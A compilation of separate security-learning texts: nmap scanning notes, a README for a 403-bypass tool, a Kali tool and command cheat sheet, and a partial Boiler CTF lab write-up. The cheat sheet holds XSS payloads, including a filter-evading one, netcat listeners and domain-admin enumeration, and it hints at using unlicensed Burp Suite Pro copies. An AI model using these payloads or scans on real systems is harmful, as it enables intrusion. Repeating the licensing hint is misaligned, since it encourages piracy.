Machine A sends RST + ACK on 22
#### Filtered
Machine A sends `SYN packet` to Machine B
but Firewall or packet filter will stop the packet will stop packet from reaching Machine B
Firewall or packet filter will only block or drop the packet which is define in ruleset.
#### Unfiltered
Machine A sends SYN packet to Machine B
Machine B reply with ICMP packet
Nmap can't be decide that port is open/closed
**Create rule to block the all packet on port 22**
```bash
sudo iptables -I INPUT -p tcp --dport=22 -j DROP
# iptables: arp tables
# -I : chain (INPUT/OUTPUT)
# -p: protocol (tcp/udp)
# --dport=22: destination port assinged port 22
# -j: ACCEPT/DROP/DENY the packet
```
#### open filtered
firewall set to drop all SYN flag(machine want to connect) and only tansfer data which is already connected
to bypass NULLL scan, XMAS scan FIN scan
NULL scan sends packet which has nothing raw packet.
pass firewall, Machine reply
case1: if port is closed then Machine then response with RST flag
case2: sneds ICMP packet nmap can't decide port is open or not.
case3: when machine A not got response from Machine B
firewall is droping packet or Machine B sends reply but firewall is droping the that reply packet.
```bash
sudo nmap -p 7553 -sN scanme.nmap.org
# -sN: NUll scan
```
no response open or closed
#### close filtered
same open filtered
IDLE scan used
### Scan timings
T0: paranoid slow, in case of IDS
T1: sneaky less slow, in case of IDS
T2: polite
T3: normal default
T4: aggressive fast
T5: insane fastest less accurrcy
```
nmap 192.168.1.1 -T4
```
**host timeout**
if service take too long time(specific time)
then leave move to next port.
```bash
nmap --host-timeout 500ms <ip addr>
```
**Scan delay**
delay/wait/stop packet to sends
```
nmap --scan-delay 1s <ip addr>
# 1s: 1 sconds
```
### output types
to save output
1. `-oN`: normal text output
```
nmap 192.168.1.1 -oN text.txt
```
2. `-oX`: xml format
```
nmap 192.168.1.1 -oX file.xml
```
3. `-oG`: grepable format
4. `-oS`: script kiddie format [state -> st4t4]
```
nmap 192.168.1.1 -oS file
```
### NSE (Nmap Script Engine)
1. firewall bypass
2. ftp enum
3. dns enum
4. http enu
```
nmap scanme.nmap.org --script http-headers
```
to see scripts
```
cd /usr/share/nmap/scripts
```
### MISC
- service version
```
nmap -sV <ip addr>
```
- os detection
```
nmap -O <ip addr>
```
- verbosity
```
nmap -v <ip>
```
- service version + os detection + scannig + traceroute
```
nmap -A <ip addr>
# aggressive scan
```
- scan ipv6 hots
```
nmap -6 <ipv6 addr>
```
|
# 403bypasser
automate the procedure of 403 response code bypass
# Description
i notice a lot of #bugbountytips describe how to bypass 403 response code so when i collect all methods i have found that i need more than 40 request to handle all methods . so as i love automating i have created this tool to do the heavy work . but as i also recommend you need later to check it manually
The tool use three technique to try to bypass 403 response code and give out the response code for each retry in coloured output to be easy to read :
1- use multiple request methods ( GET - POST- HEAD... etc)
2- use multiple payloads at the end of URL (kudos to those who tweet these tips)
3- add headers to the request (X-Forwarded-Host , X-Host ... etc )
# Installation :
1- git clone https://github.com/smackerdodi/403bypasser.git
2- cd 403bypasser
3- pip3 install -r requirements.txt
# Usage
the tool take two arguments : url - path
python3 403bypasser.py url path
EX : python3 403bypasser.py https://www.example.com /admin ( space between url and path )
# Todo :
make this tool deal with multiple threads and take a list of URLs not just one URL
# what you can do :
If you get a bounty out of this tool . whatever your relegion is please pray for me
|
# :sun_with_face: Awesome Security Tool List :four_leaf_clover:
This is a list of security tools & commands that I have used or recommend. I'm using Kali Linux VM with a Windows host computer. Welcome any contributions! :muscle:
& Wish you all good luck on your way of finding the hidden treasures. :wink:
_Author: Lee Ting Ting_
## Table of Contents
:gem: **[Software Tools](#sun_with_face-software-tools)**
:gem: **[Common Commands & CLI](#sun_with_face-common-commands--cli)**
:gem: **[Web Scripts](#sun_with_face-web-scripts)**
:gem: **[Useful Python Libraries & Scripts](#sun_with_face-useful-python-libraries--scripts)**
:gem: **[Online Tools](#sun_with_face-online-tools)**
:gem: **[Learning / Practicing Websites](#sun_with_face-learning--practicing-websites)**
:gem: **[Curated GitHub Repos / Toolkits](#sun_with_face-curated-github-repos--toolkits)**
:gem: **[Common Security Acronyms](#sun_with_face-common-security-acronyms)**
:gem: **[Special Thanks](#sun_with_face-special-thanks)**
## :sun_with_face: Software Tools
1. **[Ghidra](https://ghidra-sre.org/): Decompile binary files.**
- Satisfy the [minimum requirements](https://ghidra-sre.org/InstallationGuide.html#Requirements) (Java 11 JDK) and download Ghidra from the above website.
- After extracting the downloaded Ghidra package, open `ghidraRun.bat` to start.
- Select New project > Import Files, then select your binary file to analyze.
- In the `Symbol Tree` tab on the left, find and select `main` under `Functions`.
- Then, select `Windows` > `Decompile:main` from the top menu to see readable code.
2. **[StegSolve](https://github.com/zardus/ctf-tools/blob/master/stegsolve/install): A java app that solves steganography by apply various filters.**
- Steganography is to conceal a message, image, or file within another message, image, or file.
- Installation instruction is in the above link.
- Reference: [Wiki](https://en.wikipedia.org/wiki/Steganography)
3. **[Burp Suite Professional](https://portswigger.net/burp/pro): A software that uses proxy (usually localhost:8080) to intercept HTTP requests.**
- You can edit and resend the intercepted HTTP requests.
- The Community version is very slow.. don't use it. You should be able to find free professional licenses online:)
4. **[IDA Pro 32/64 bit](https://www.hex-rays.com/products/ida/support/download_freeware/): A software that generates assembly code from binary files.**
- Download IDA Pro 64-bit from the above link, and download IDA Pro 32-bit with pseudocode decompiler [here](https://drive.google.com/open?id=1CCRnlhXZCUwH1P5WisLf6CQtHv6dTtFZ).
- Hotkeys:
- `F5`: view pseudocode
- `tab`: toggle between the disassembly code view and pseudocode view.
- `Shift+F12`: view all strings in the program.
- Note that 32-bit programs need to be opened with IDA Pro 32-bit, and vice versa.
- Reference: [IDA Pro Hotkey Cheatsheet](https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf)
5. **[GIMP](https://www.gimp.org/): The GNU Image Manipulation Platform**
- Install version 2.10.4 on Windows [here](https://download.gimp.org/mirror/pub/gimp/v2.10/windows/) (there is a known bug in the latest version by the time of writing)
- GNU: A Unix-like operating system and a collection of free softwares. GNU means "GNU's Not Unix!" ([wiki](https://en.wikipedia.org/wiki/GNU))
- Can apply various filters to images for solving steganography problems
## :sun_with_face: Common Commands & CLI
1. **`lsof -i -P -n | grep LISTEN`: Show listening ports.**
- lsof: list open files and processes that opened them.
- `-i`: list all network connections.
- `-P`: list port number instead of port name.
- `-n`: don't convert network number to hostname, this can make lsof run faster.
- reference: [manual](https://man7.org/linux/man-pages/man8/lsof.8.html)
2. **`xdg-open .`: Open current folder in GUI explorer.**
- This is useful for dragging and dropping files from Linux VM to host computer.
- reference: [StackExchange](https://askubuntu.com/questions/31069/how-to-open-a-file-manager-of-the-current-directory-in-the-terminal)
3. **`kill $(lsof -t -i:8080)`: Kill any process listening on port 8080.**
- reference: [StackOverflow](https://stackoverflow.com/questions/11583562/how-to-kill-a-process-running-on-particular-port-in-linux)
4. **`display <image_name>`: Display image from terminal.**
- Make sure that [imagemagick](https://tecadmin.net/install-imagemagick-on-linux/) is installed before using this.
- reference: [StackExchange](https://unix.stackexchange.com/questions/35333/what-is-the-fastest-way-to-view-images-from-the-terminal)
5. **`nc -l -p 9000`: Listen on port 9000**
- use `nc <ip_address> 9000` to communicate with the host.
6. **`grep -rnw '/path/to/somewhere/' -e 'pattern'`: Find all files containing the pattern under the specified path.**
- `-r`: recursively search
- `-n`: display the line number containing the pattern in the file.
- `-w`: match the entire word of the pattern.
- Reference: [StackOverflow](https://stackoverflow.com/questions/16956810/how-do-i-find-all-files-containing-specific-text-on-linux)
7. **`strings <filename>`: Print all strings in the file.**
- use `strings <filename> | grep -E <some_regex>` to find the strings that match the regular expression, `FLAG{[a-zA-Z0-9_!@]+}`, for example.
- Test regular expressions online at https://regexr.com/.
8. **`strace <filename>`: Print out system call details.**
- If not installed, run `sudo apt-get install strace`.
- Use `strace -s 50 <filename>` to print out the strings with max length 50.
- Reference: [manual](https://man7.org/linux/man-pages/man1/strace.1.html)
9. **`objdump -M intel -d <filename> | less`: Show the disassembled file.**
- `-M intel`: display the assembly in Intel syntax (see the differences between the default AT&T syntax and the Intel syntax in [wiki](https://en.wikipedia.org/wiki/X86_assembly_language#Syntax)).
- `-d`: disassemble
- `-C`: decode (demangle) low-level symbol names into readable names
- The `less` command is for viewing the contents of the file, allow both forward and backward navigation. (The `more` command only allow forward navigation.)
- Can also use `grep` to get specific data.
- When using `less` to view the file, you can use `/<anything_you_want_to_search>` to search for specific strings. For example, use `/main` to locate the main function.
- Reference: [manual](https://sourceware.org/binutils/docs/binutils/objdump.html)
10. **`binwalk -Mre <filename>`: Firmware analysis & reverse engineering.**
- Follow the installation instructions [here](https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md).
- `-M`: recursively scan extracted files.
- `-r`: delete carved file after extraction. ([what is file carving?](https://resources.infosecinstitute.com/file-carving/#gref))
- `-e`: extract known file types.
- Reference: [GitHub](https://github.com/ReFirmLabs/binwalk)
11. **`qemu-mipsel <filename>`: Execute MIPS programs on non-MIPS OS.**
- [Installation instructions](https://zoomadmin.com/HowToInstall/UbuntuPackage/qemu-system-mips)
- If you run into "No such file or directory", run `export QEMU_LD_PREFIX=<folder_location_of_the_missing_file>` and retry the above command to help the program find your file.
- QEMU: Quick EMUlator
- mipsel: little-endian MIPS / mips: big-endian MIPS ([little vs big endian?](https://chortle.ccsu.edu/AssemblyTutorial/Chapter-15/ass15_3.html))
- Reference: [Official Website](https://www.qemu.org/docs/master/system/target-mips.html)
12. **`gdb ./<executable_program>`: The GNU Project Debugger.**
- Install: `sudo apt-get update` then `sudo apt-get install gdb`.
- Common commands in the gdb console:
- `r`: run the program until next breakpoint or error
- `c`: continue running the program
- `f`: run the program until current function is finished
- `s`: step to the next line of the program
`n`: step to the next line of the program, but does not step into functions
- `b main`: set breakpoint at the main function
- `d`: delete all breakpoints
- `jump *main+135`: jump to the address of the main function address with offset 135
- `p/x $rax`: print the rax register in hex
- `p/d <variable>`: print the variable as signed integer
- `x/wx $esp`: print the memory address of the register esp in hex format
- `set $esi = 0x1`: set value of the register
- `vmmap`: print out the memory address mapping to libraries and also the rwx (read, write, execute) permissions.
- `q`: quit gdb
- Tips: Keep an eye on the `cmp` (compare) statement when looking at the assembly code because usually if you can pass the compare statement, you can guess the correct input of the program.
- To bypass `cmp` statements, you can either modify the register value to the desired one or jump to the next memory address right after the `cmp` statement.
- Reference: [Official Website](https://www.gnu.org/software/gdb/)
13. **`nc <ip> <port>`: Connect to remote server**
- nc stands for [Netcat](https://en.wikipedia.org/wiki/Netcat)
- Use `ncat -vc $binary -kl $ip $port` to host the binary file on a remote server.
14. **`checksec ./<executable_binary>`: Check the security properties of a program**
- Properties checked:
- **`Arch`: The architecture of the program.**
- For example, `amd64-64-little` means AMD64 architecture that uses little endian.
- **`RELRO`: Is partial or full binary sections read-only?**
- RELRO: [Relocation Read-Only](https://ctf101.org/binary-exploitation/relocation-read-only/)
- If full, "GOT([Global Offset Table](https://en.wikipedia.org/wiki/Global_Offset_Table)) overwrite" attack is not possible.
- **`STACK`: Does stack canary exist?**
- It is a technique to detect stack overflow by placing a number (named canary) before the stack return pointer, and check if the value has been changed.
- Reference: [CTF Wiki](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary/)
- **`NX`: Is NX protection enabled?**
- NX: [No eXecute](https://ctf101.org/binary-exploitation/no-execute/)
- If yes, we cannot use stack overflow to execute our customized shellcodes.
- **`PIE`: Prevents attackers by randomizing the memory address of the executable.**
- PIE: [Position Independent Executable](https://en.wikipedia.org/wiki/Position-independent_code#Position-independent_executables)
- If enabled, we won't know the memory address until we run the program. Solution: Disable ASLR ([Address Space Layout Randomization](https://en.wikipedia.org/wiki/Address_space_layout_randomization)) on our OS to let the addresses remain the same.
- How to disable ASLR on Linux: [StackOverflow](https://askubuntu.com/questions/318315/how-can-i-temporarily-disable-aslr-address-space-layout-randomization)
- Reference: [GitHub](https://github.com/slimm609/checksec.sh)
15. **`r2 ./<executable_binary>`: For reverse engineering and binary analysis.**
- r2 is short for [Radare2](https://github.com/radareorg/radare2)
- Install & usage tutorial: [frozenkp's Blog](https://frozenkp.github.io/reverse/radare2/)
- Common commands in the r2 console:
- `aa`: analyze all, usually we type this every time at start
- `afl`: list all functions (analyze function list)
- `s main`: move to main function
- `s <memory_address>`: move to memory address
- `V`: switch from console to hex view
- `VV`: switch from console to visual mode (assembly code & graph)
- `: some_command`: enter commands in visual mode
- `q`: return to the previous mode / quit
16. **`gcc test.c -fno-stack-protector -o test`: Compile C code to executable with disabled canary protection**
- By disabling canary protection, the program is subjected to BOF ([Buffer Overflow](https://en.wikipedia.org/wiki/Buffer_overflow)) attack.
- Usually, if you see `Segmentation fault` after a very long input, it has BOF vulnerability.
17. **`file <filename>`: Prints out the type of the file.**
- Useful when you are not sure about the file type. For instance, an image file without a .jpg.
18. **`openssl rsa -pubin -in <path_to_public_key> -text -noout`: Find modulus from a RSA public key**
- `-pubin`: read the public key instead of private key (private key is read by default if not specified)
- `-in`: specify the input file
- `-text`: print the public / private key in plaintext
- `-noout`: prevent printing the encoded version of the key
- Reference: [OpenSSL GitHub](https://github.com/openssl/openssl), [OpenSSL RSA doc](https://www.openssl.org/docs/man1.0.2/man1/openssl-rsa.html)
19. **`nmap <ip_address>`: Scan ports of an IP address**
- You can see the protocol used of each port, whether the port is open or close, and the service of each port.
- `nmap -sU <ip_address> -p68`: UDP scan for port 68
- Reference: [official website](https://nmap.org/), [nmap options doc](https://nmap.org/book/man-briefoptions.html)
20. **`theHarvester -d ntu.edu.tw -l 50 -b google`: Use open source intelligence (OSINT) to collect information of a specific domain**
- `-d`: domain to search
- `-l`: limit the search result to this number
- `-b`: data source (google, bing, linkedin, twitter, yahoo, etc)
- [GitHub](https://github.com/laramies/theHarvester)
- Already installed in Kali Linux
21. **`wget -O 'name_of_file' <download_url>`: Download files with customized names**
- `wget -r <website_url>`: Download the entire source code of the website
22. **`unzip -P <pwd> <filename>`: Unzip zip files with password**
23. **`arp -a`: Show all IP addresses connected to the same network**
24. **`net user /domain`: Show all usernames in the current domain**
- `net groups /domain`: show all groups under current domain
- `net groups "<name_to_search>" /domain`: search for specific group name, for example: `net groups "Domain Admins" /domain`
25. **`nslookup <domain_name>`: See IP address of the domain**
26. **`whoami`: Find out which user you are currently logged in**
- `whoami /priv`: see all privileges information and whether each of them is enabled or not
27. **`` echo `nproc` ``: See the number of CPU cores**
28. **`python GitHack.py http://your_url.git/`**
- `git clone https://github.com/lijiejie/GitHack.git` to download the script
- `cd GitHack/`
## :sun_with_face: Web Scripts
1. **`view-source:<your_url>`: View source code of a website**
2. **`"><svg/onload=alert(1)>`: [XSS] Popup Alert Basic**
3. **`"><iframe srcdoc="%3Csvg%2F%26%23x6f%3Bnload%3Dalert%281%29%3E"><"`: [XSS] Popup Alert Advanced**
- `srcdoc` specifies the HTML content in iframe
- insert `<svg/onload=alert(1)>` but found that `o` will be replaced
- change `o` to `o` with the `hex(ord('o'))` Python command
- url encode `<svg/onload=alert(1)>` at [URLEncoder](https://www.urlencoder.org/)
4. **`<a href="your_url" target="<script>alert(1)</script>">click</a>`: [XSS] When the `name` variable is in the html content**
- the value of the target attribute will be stored at `window.name` or the `name` variable.
## :sun_with_face: Useful Python Libraries & Scripts
1. **[dirsearch](https://github.com/maurosoria/dirsearch): A CLI to brute force directories and files in websites.**
```
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>
```
2. **[Pwn](https://en.wikipedia.org/wiki/Pwn): Compromise a program by gaining ownership of it.**
- Follow installation steps on [Pwntools GitHub](https://github.com/Gallopsled/pwntools#installation)
- In most cases, the flag can be found in the interactive console by `ls` and then `cat flag.txt`.
- Example:
```python
from pwn import *
# remember to change the values here
HOST = "<ip.address>"
PORT = <port_number>
# connect to the remote server and define our value to send
r = remote(HOST, PORT)
# For reading local binaries:
# r = process('./<executable_binary>')
something_to_send = 0xfaceb00c
# Usually there is a newline before the user input, so receive until '\n'
r.recvuntil('\n')
# stop and listen to user input in the console, press enter to continue
raw_input()
r.sendline(p32(something_to_send))
# use r.send() to send without a new line
# use p32 to encode the hex value as 32-bit char and p64 for 64-bit char
# enter the interactive console
r.interactive()
```
3. **[Angr](https://github.com/angr/angr): A collection of binary analysis tools**
- [Install doc](https://docs.angr.io/introductory-errata/install)
- Symbolic Execution example:
- Symbolic execution can be used to find the input that can reach our desired program state ([wiki](https://en.wikipedia.org/wiki/Symbolic_execution#:~:text=In%20computer%20science%2C%20symbolic%20execution,of%20a%20program%20to%20execute.)).
```python
import angr
import claripy # Angr's constraint solver engine
# replace this with the binary you want to analyze
# disable auto_load_libs to improve performance
project = angr.Project("./<binary>", auto_load_libs=False)
# create a symbolic object with 25 bytes
# BV stands for BitVector (bit array)
argv1 = claripy.BVS("argv1", 25*8)
# specify the entry point of the program and our input parameter
initial_state = project.factory.entry_state(args=["./<binary>", argv1])
# generate a simulation manager object for solving our parameter later
sm = project.factory.simulation_manager(initial_state)
# symbolically execute until we find a state with address = find_addr
find_addr = 0x400602
sm.explore(find=find_addr)
# find the state that meets the above condition
found = sm.found[0]
# return the input value to get to this state and cast it to bytes
solution = found.solver.eval(argv1, cast_to=bytes)
# repr: returns a printable representation of the input object
print(repr(solution))
```
4. **[Z3-solver](https://pypi.org/project/z3-solver/): An efficient SMT solver**
- Install via pip install
- SMT: satisfiability modulo theories ([wiki](https://en.wikipedia.org/wiki/Satisfiability_modulo_theories))
- [Documentation](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)
- Example:
- Steps
1. define the variables
2. add constraints
3. solve the equations
```python
from z3 import *
x = Int('x')
y = Int('y')
solve(x > 2, y < 10, x + 2*y == 7)
# output: [y = 0, x = 7]
```
```python
from z3 import *
p = Bool('p')
q = Bool('q')
r = Bool('r')
solve(Implies(p, q), r == Not(q), Or(Not(p), r))
# output: [q = False, p = False, r = True]
# Implies: Logical Implication
```
```python
from z3 import *
x, y, z = Reals('x y z') # real numbers
# add constraints
s = Solver()
s.add(x > 1, y > 1, x + y > 3, z - x < 10)
# check if the constraints can be satisfied (output: sat / unsat)
print(s.check())
# use model to specify multiple constraints and make each of them true
m = s.model()
# print the value of x
print("x = %s" % m[x])
# output: x = 3/2
```
5. **[SymPy](https://docs.sympy.org/latest/index.html): For symbolic mathematics**
- [Install doc](https://docs.sympy.org/latest/install.html)
- Example:
```python
import sympy
# inverse function
def inv(x, m):
return sympy.invert(x, m)
print(inv(11, 26))
# output: 19
```
6. **[Crypto.Util.number](https://pycryptodome.readthedocs.io/en/latest/src/util/util.html#module-Crypto.Util.number): Contains lots of utilities for numbers**
- Example for solving RSA:
```python
from Crypto.Util.number import inverse
p = <some_number>
q = <some_number>
e = <some_number>
c = <some_number>
n = p*q
phi = (p-1) * (q-1)
d = inverse(e, phi)
# c^d % n (c to the power of d, modulus n)
m = pow(c, d, n)
print(m)
```
7. **Install all modules**
- requirements.txt: `pip3 install -r requirements.txt` (or pip install)
- setup.py: `python3 setup.py install`
## :sun_with_face: Online Tools
1. **[HexDecode](https://www.convertstring.com/EncodeDecode/HexDecode)**: Convert hex to text
2. **[URLDecoder](https://www.urldecoder.org/)**: URL decode and encode
3. **[FactorDB](http://www.factordb.com/)**: Factorize any number
4. **[XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)**: Copy-and-paste cross-site scripting cheat sheet
5. **[CMD5](https://www.cmd5.com/)**: Hash to plaintext using a large dictionary
## :sun_with_face: Learning / Practicing Websites
1. **[PortSwigger](https://portswigger.net/web-security/all-labs)**: Its web security lab covers topics across SQL injection, Cross-site scripting, Cross-site request forgery (CSRF), Cross-origin resource sharing (CORS), Server-side request forgery (SSRF), etc.
2. **[OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)**: An insecure web application for you to attack! ([reference solutions](https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.html))
3. **[MITRE ATT&CK Matrix](https://attack.mitre.org/)**: A list of attack techniques based on real world observations.
4. **[Prompt.ml](http://prompt.ml/)**: A XSS practicing website. Solutions are available [here](https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml).
## :sun_with_face: Curated GitHub Repos / Toolkits
1. **[XS-Leaks](https://github.com/xsleaks/xsleaks)**: XS-leak example code, past exploits explanation, link to xs-leak wiki and related materials.
2. **[Gophish](https://github.com/gophish/gophish)**: Phishing toolkit to launch and tracking phishing campaigns ([official website](https://getgophish.com/)).
## :sun_with_face: Common Security Acronyms
1. **RDP**: Remote Desktop Protocol
2. **IIS**: Internet Information Services
3. **WAF**: Web Application Firewall
4. **OT**: Operation Technology
5. **AD**: Active Directory
6. **LPE**: Local Privilege Escalation
7. **RCE**: Remote Code Execution
8. **SMB**: Server Message Block
9. **LFI**: Local File Inclusion
10. **SAM**: Security Account Manager
11. **VNC**: Virtual Network Computing
12. **OSINT**: Open-source Intelligence
13. **ASHX**: ASP.NET Web Handler File, file extension of an ASP.NET web app
14. **NTLM**: New Technology LAN Manager, used by Windows to hash passwords ([wiki](https://en.wikipedia.org/wiki/NT_LAN_Manager))
15. **EDR**: Endpoint Detection and Response
16. **IDS**: Intrusion Detection System
17. **DC**: Domain Controller (AD vs DC: AD is a type of domain, DC is an important server on that domain)
18. **APT**: Advanced Persistent Threat, hackers gain unauthorized access to a computer network and remains undetected for an extended period ([wiki](https://en.wikipedia.org/wiki/Advanced_persistent_threat)).
19. **CVE**: Common Vulnerabilities and Exposures
20. **PPA**: Personal Package Archive
## :sun_with_face: Special Thanks
- Learned a lot from the course "EE5188 Practicum of Attacking and Defense of Network Security" at [National Taiwan University](https://www.ntu.edu.tw/english/) & [AIS3](https://ais3.org/).
- Cute emojis from [here](https://gist.github.com/rxaviers/7360908)! :blush:
|
# Boiler CTF
Intermediate level CTF
## [Task 1] Questions #1
Intermediate level CTF. Just enumerate, you'll get there.
### #1 - File extension after anon login
The nmap full scan output:
~~~
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.54
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
~~~
`anon` refers to anonymous, for the FTP connection. Let's connect as `anonymous` and list the files:
~~~
$ ftp 10.10.127.30
Connected to 10.10.127.30 (10.10.127.30).
220 (vsFTPd 3.0.3)
Name (10.10.127.30:unknown): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,14,231,166,133).
150 Here comes the directory listing.
226 Directory send OK.
~~~
Hum, nothing here, seriously? Let's show hidden files:
~~~
ftp> ls -la
227 Entering Passive Mode (10,10,14,231,191,194).
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
227 Entering Passive Mode (10,10,14,231,194,215).
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.000871 secs (84.96 Kbytes/sec)
ftp> quit
221 Goodbye.
~~~
This time, there is a `.info.txt` file (the extension is `txt`, to answer the question). Let's see what the file is.
~~~
$ file .info.txt
.info.txt: ASCII text
$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
~~~
The secret message is ` Just wanted to see if you find it. Pop. Remember: Enumeration is the key!` (decrypted with https://quipqiup.com/).
Answer: `txt`
### #2 - What is on the highest port?
`SSH` is running on the highest port (`55007/tcp`).
Answer: `ssh`
### #3 - What's running on port 10000?
When connecting to http://10.10.127.30:10000/, we are told that the service runs on https. Connecting to https://10.10.127.30:10000/ shows an authentication form to Webmin.
Answer: `webmin`
### #4 - Can you exploit the service running on that port? (yay/nay answer)
Answer: `nay`
### #5 - What's CMS can you access?
#### robots.txt
There is a `robots.txt` file:
~~~
$ curl http://10.10.127.30/robots.txt
User-agent: *
Disallow: /
/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
~~~
None of the URL exists. What about the encoded string?
~~~
$ python
>>> a = "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075"
''.join([chr(int(i)) for i in a.split(' ')])
>>> ''.join([chr(int(i)) for i in a.split(' ')])
'OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK'
>>> import base64
>>> base64.b64decode(_)
b'99b0660cd95adea327c54182baa51584\n'
~~~
The MD5 hash (`99b0660cd95adea327c54182baa51584`) is corresponding to the string `kidding`. This URL does not exist either.
#### Gobuster
The `robots.txt` was a wrong track. Let's brute force the discovery with gobuster:
~~~
gobuster dir -u http://10.10.127.30 -w /data/src/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.127.30
[+] Threads: 10
[+] Wordlist: /data/src/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/11 20:45:02 Starting gobuster
===============================================================
/manual (Status: 301)
/joomla (Status: 301)
...[SNIP]...
~~~
Joomla, that's likely the CMS we are looking for!
Answer: `joomla`
### #6 - Keep enumerating, you'll know when you find it.
*Hint: List & read, don't reverse*
Joomla has an administration part, available by appending `/administrator` to the URL (http://10.10.127.30/joomla/administrator/).
### #7 - The interesting file name in the folder?
### dirsearch
~~~
$ /data/src/dirsearch/dirsearch.py -u http://10.10.127.30/joomla/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220529
Error Log: /data/src/dirsearch/logs/errors-20-05-12_13-48-36.log
Target: http://10.10.127.30/joomla/
[13:48:36] Starting:
[13:48:37] 301 - 322B - /joomla/images -> http://10.10.127.30/joomla/images/
[13:48:37] 200 - 12KB - /joomla/
[13:48:37] 301 - 321B - /joomla/media -> http://10.10.127.30/joomla/media/
[13:48:37] 301 - 325B - /joomla/templates -> http://10.10.127.30/joomla/templates/
[13:48:38] 301 - 323B - /joomla/modules -> http://10.10.127.30/joomla/modules/
[13:48:39] 403 - 299B - /joomla/.hta
[13:48:39] 301 - 324B - /joomla/_archive -> http://10.10.127.30/joomla/_archive/
[13:48:39] 301 - 325B - /joomla/_database -> http://10.10.127.30/joomla/_database/
[13:48:39] 301 - 322B - /joomla/_files -> http://10.10.127.30/joomla/_files/
[13:48:39] 301 - 321B - /joomla/_test -> http://10.10.127.30/joomla/_test/
[13:48:39] 301 - 321B - /joomla/tests -> http://10.10.127.30/joomla/tests/
[13:48:39] 301 - 319B - /joomla/bin -> http://10.10.127.30/joomla/bin/
[13:48:40] 301 - 323B - /joomla/plugins -> http://10.10.127.30/joomla/plugins/
[13:48:41] 301 - 324B - /joomla/includes -> http://10.10.127.30/joomla/includes/
[13:48:42] 301 - 324B - /joomla/language -> http://10.10.127.30/joomla/language/
[13:48:43] 301 - 326B - /joomla/components -> http://10.10.127.30/joomla/components/
[13:48:43] 301 - 321B - /joomla/cache -> http://10.10.127.30/joomla/cache/
[13:48:44] 301 - 325B - /joomla/libraries -> http://10.10.127.30/joomla/libraries/
[13:48:51] 301 - 328B - /joomla/installation -> http://10.10.127.30/joomla/installation/
[13:48:53] 301 - 321B - /joomla/build -> http://10.10.127.30/joomla/build/
[13:48:55] 301 - 319B - /joomla/tmp -> http://10.10.127.30/joomla/tmp/
[13:48:57] 301 - 323B - /joomla/layouts -> http://10.10.127.30/joomla/layouts/
[13:49:08] 301 - 329B - /joomla/administrator -> http://10.10.127.30/joomla/administrator/
[13:50:31] 301 - 319B - /joomla/cli -> http://10.10.127.30/joomla/cli/
Task Completed
~~~
#### Wrong tracks
~~~
$ curl -s http://10.10.115.78/joomla/_files/ | html2text
# VjJodmNITnBaU0JrWVdsemVRbz0K
$ echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d
Whopsie daisy
~~~
~~~
$ curl -s http://10.10.127.30/joomla/~www/ | html2text
# Mnope, nothin to see.
$ curl -s http://10.10.127.30/joomla/_archive/ | html2text
# Mnope, nothin to see.
~~~
~~~
unknown@localhost:/data/src/wordlists$ curl -s http://10.10.127.30/joomla/_database/ | html2text
# Lwuv oguukpi ctqwpf.
~~~
